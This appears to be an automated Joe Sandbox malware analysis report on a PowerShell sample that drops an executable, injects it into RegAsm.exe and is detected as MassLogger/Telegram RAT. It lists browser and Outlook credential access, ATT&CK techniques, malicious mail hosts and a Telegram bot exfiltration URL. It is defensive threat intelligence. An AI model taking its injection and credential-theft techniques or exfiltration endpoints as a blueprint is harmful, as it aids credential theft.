Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00F0C168 LdrInitializeThunk,LdrInitializeThunk,

5_2_00F0C168

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9E2008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42e4aa0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42cdc80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.x.exe.42b6e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 1428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1280, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	3 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Software Packing	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jqxrkk.ps1	13%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\x.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\x.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://mail24430.maychuemail.comd	0%	Avira URL Cloud	safe
http://mail.phobinh.com.vnd	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0-	0%	Avira URL Cloud	safe
http://mail24430.maychuemail.com	0%	Avira URL Cloud	safe
http://mail.phobinh.com.vn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mail24430.maychuemail.com	123.30.244.30	true	true	unknown
reallyfreegeoip.org	104.21.16.1	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high
mail.phobinh.com.vn	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://checkip.dyndns.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2218404373.0000023CB9FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC8743000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0-	RegAsm.exe, 00000005.00000002.3421733892.0000000005CA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3415809274.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.orgd	RegAsm.exe, 00000005.00000002.3418127650.000000000297D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.000000000294E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.	RegAsm.exe, 00000005.00000002.3421733892.0000000005C60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.phobinh.com.vn	RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.2218404373.0000023CB9F88000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000000.00000002.2251667720.0000023CD090B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189l	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comd	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://mail24430.maychuemail.com	RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2218404373.0000023CB9FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC8743000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2240464969.0000023CC84D9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegAsm.exe, 00000005.00000002.3418127650.000000000297D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgd	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail24430.maychuemail.comd	RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.phobinh.com.vnd	RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2218404373.0000023CB8461000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/d	RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002A36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2218404373.0000023CB8461000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.00000000028E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot-/sendDocument?chat_id=	x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000000.00000002.2218404373.0000023CB9A6D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	x.exe, 00000004.00000002.2228950567.0000000004244000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3418127650.0000000002960000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.3414537023.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
123.30.244.30	mail24430.maychuemail.com	Viet Nam	7643	VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586898
Start date and time:	2025-01-09 18:32:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jqxrkk.ps1
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winPS1@6/7@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 58 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5088 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: jqxrkk.ps1

Simulations

Behavior and APIs

Time	Type	Description
12:33:16	API Interceptor	5x Sleep call for process: powershell.exe modified
12:33:25	API Interceptor	86x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	ENQ-0092025.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	document pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ITT # KRPBV2663 .doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	kP8EgMorTr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.64.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
